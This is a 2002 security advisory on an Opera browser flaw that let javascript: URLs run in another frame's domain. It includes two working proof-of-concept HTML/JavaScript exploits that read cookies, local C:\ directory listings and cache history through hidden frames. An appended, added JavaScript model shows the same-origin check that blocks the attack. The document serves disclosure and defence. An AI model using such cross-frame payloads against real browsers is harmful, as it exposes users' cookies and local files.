
Opera web browser javascript protocol permit to read cookies/filesystem/cache
16th May 2002 [SBWID-5346]
COMMAND

	Opera web browser javascript protocol permit to read cookies/filesystem/cache

SYSTEMS AFFECTED

	At least Opera 6.01, 6.0, 5.12

PROBLEM

	In Andreas Sandblad's [sandblad@acc.umu.se] advisory [#6]:
	

	                                                   _     _
	                                                 o' \,=./ `o
	                                                    (o o)
	---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

	

	Opera allows the location of a frame to be overwritten by a URL containing
	the javascript protocol. The javascript code will be operating in the same
	domain as the URL that was overwritten. Thus we can read cookies from other
	domains, local file structure and private information from the cache
	(history of links visited).
	

	

	 EXPLOIT I:
	 ==========
	
	The following exploit has been tested to work on Opera 6.01, 6.0 (win).
	It will not work on 5.x because it requires the iframe feature.
	
	------------------- CUT HERE -----------------------------------
	<!-- hidden frames holding the documents whose DOM the script will read -->
	<iframe name=cookie src="http://www.google.com/" height=0 width=0></iframe>
	<iframe name=files src="file://c:/" height=0 width=0></iframe>
	<iframe name=cache src="opera:cache" height=0 width=0></iframe><br>
	<a href="javascript:readCookie()">Read google cookie</a><br>
	<a href="javascript:readFiles()">Read c:/ structure (win)</a><br>
	<a href="javascript:readCache()">Read links in cache</a><br>
	<script>
	// each function sets a frame's location to a javascript: URL; the
	// vulnerable Opera runs that script in the framed document's domain
	function readCookie(){
	  cookie.location="javascript:alert(document.cookie)";
	}
	function readFiles(){
	  t = 'javascript:s="";l=document.links;';
	  t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
	  files.location = t;
	}
	function readCache(){
	  t = 'javascript:s="";l=document.links;';
	  t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
	  cache.location = t;
	}
	</script>
	------------------- CUT HERE -----------------------------------

	

	

	 EXPLOIT II:
	 ===========
	
	For versions of Opera not supporting the iframe tag the exploit must be
	done using the frame tag instead. The following exploit has been tested
	on Opera 6.01, 6.0, 5.12 (win).
	
	------------------- CUT HERE -----------------------------------
	<HTML>
	<FRAMESET ROWS="100%,0,0,0">
	<FRAME SRC="payload.html">
	<FRAME NAME="cache" src="opera:cache" noresize>
	<FRAME NAME="files" src="file:///c:/" noresize>
	<FRAME NAME="cookie" src="http://www.google.com/" noresize>
	</FRAMESET>
	</HTML>
	------------------- CUT HERE -----------------------------------

	

	payload.html:
	
	------------------- CUT HERE -----------------------------------
	<a href="javascript:alert(document.cookie)" target="cookie">Google
	cookie</a><br>
	<a href="javascript:alert(document.links.item(0))" target="cache">First
	item in cache</a><br>
	<a href="javascript:alert(document.links.item(1))" target="files">First
	file/directory in c:\ (win)</a>
	------------------- CUT HERE -----------------------------------

	

SOLUTION

	Get Opera 6.02:
	

	http://www.opera.com/
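An added example, not code from the advisory and not Opera's own fix: a small JavaScript model of the rule the exploits above violate. `navigateFrameVulnerable` reproduces the behaviour the advisory describes, where the javascript: code runs against the framed document no matter which page triggered the navigation; `navigateFrame` applies the same-origin check modern browsers make, dropping a javascript: navigation unless the initiating document shares the frame document's origin. `framingAllowed` models the framed site's own defence, the X-Frame-Options header, which did not exist in 2002. The attacker.example hostname, the frame objects and every function name are constructed for this example; it runs under Node.js with no dependencies.

```javascript
// Added example, not code from the advisory or from Opera: a model of the
// same-origin rule that governs pointing a frame at a javascript: URL, with the
// behaviour the advisory describes beside the corrected rule. Function names
// and the attacker.example hostname are illustrative, not browser APIs.

// Origin of a document URL. WHATWG URL gives "null" for schemes such as
// file:, opera: and javascript:; such opaque origins match nothing, not even
// another document from the same scheme.
function originOf(href) {
  const origin = new URL(href).origin;
  return origin === "null" ? null : origin;
}

function sameOrigin(hrefA, hrefB) {
  const a = originOf(hrefA);
  return a !== null && a === originOf(hrefB);
}

// A named frame and the URL of the document currently loaded in it.
function makeFrame(name, href) {
  return { name, href };
}

function runScriptIn(frame, target) {
  return {
    action: "run-script",
    frame: frame.name,
    document: frame.href,                        // script sees this document's DOM
    script: decodeURIComponent(target.pathname), // text after "javascript:"
  };
}

// Behaviour the advisory describes for Opera 6.01 and earlier: the initiator
// is never checked, so the script always runs with the framed document's DOM.
function navigateFrameVulnerable(initiatorHref, frame, targetHref) {
  const target = new URL(targetHref);
  if (target.protocol === "javascript:") return runScriptIn(frame, target);
  return { action: "load", frame: frame.name, url: target.href };
}

// Corrected rule (what the HTML specification requires today): a javascript:
// navigation of a frame is dropped unless the initiating document is
// same-origin with the frame's current document. Ordinary URL navigations of
// a cross-origin frame stay allowed; they replace the document, not read it.
function navigateFrame(initiatorHref, frame, targetHref) {
  const target = new URL(targetHref);
  if (target.protocol === "javascript:") {
    if (!sameOrigin(initiatorHref, frame.href)) {
      return { action: "blocked", frame: frame.name, reason: "cross-origin javascript: navigation" };
    }
    return runScriptIn(frame, target);
  }
  return { action: "load", frame: frame.name, url: target.href };
}

// Defence in depth on the framed site's side, independent of any browser fix:
// a page that refuses third-party framing never ends up in the attacker's
// frame. Models the later X-Frame-Options header (DENY / SAMEORIGIN).
function framingAllowed(xFrameOptions, pageHref, framerHref) {
  const value = (xFrameOptions || "").trim().toUpperCase();
  if (value === "DENY") return false;
  if (value === "SAMEORIGIN") return sameOrigin(pageHref, framerHref);
  return true; // header absent or unrecognised: framing permitted
}

// Constructed scenario replaying the advisory: the attacker page frames the
// three documents from the exploit and points each frame at a javascript: URL.
const ATTACKER = "http://attacker.example/"; // constructed hostname
const FRAMES = [
  makeFrame("cookie", "http://www.google.com/"),
  makeFrame("files", "file:///c:/"),
  makeFrame("cache", "opera:cache"),
];
const READ_COOKIE = "javascript:alert(document.cookie)";

function replay(navigate) {
  return FRAMES.map((frame) => navigate(ATTACKER, frame, READ_COOKIE).action);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log("vulnerable:", replay(navigateFrameVulnerable));
  console.log("corrected: ", replay(navigateFrame));
}
```

Run it with node: the replay reports run-script for all three frames under the old behaviour and blocked under the corrected rule, while a same-origin page may still script its own frames and a cross-origin frame may still be navigated to an ordinary URL. Because file: and opera: documents get opaque origins in this model, even a file: page cannot script another file: frame, which matches how browsers treat local files today.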

	
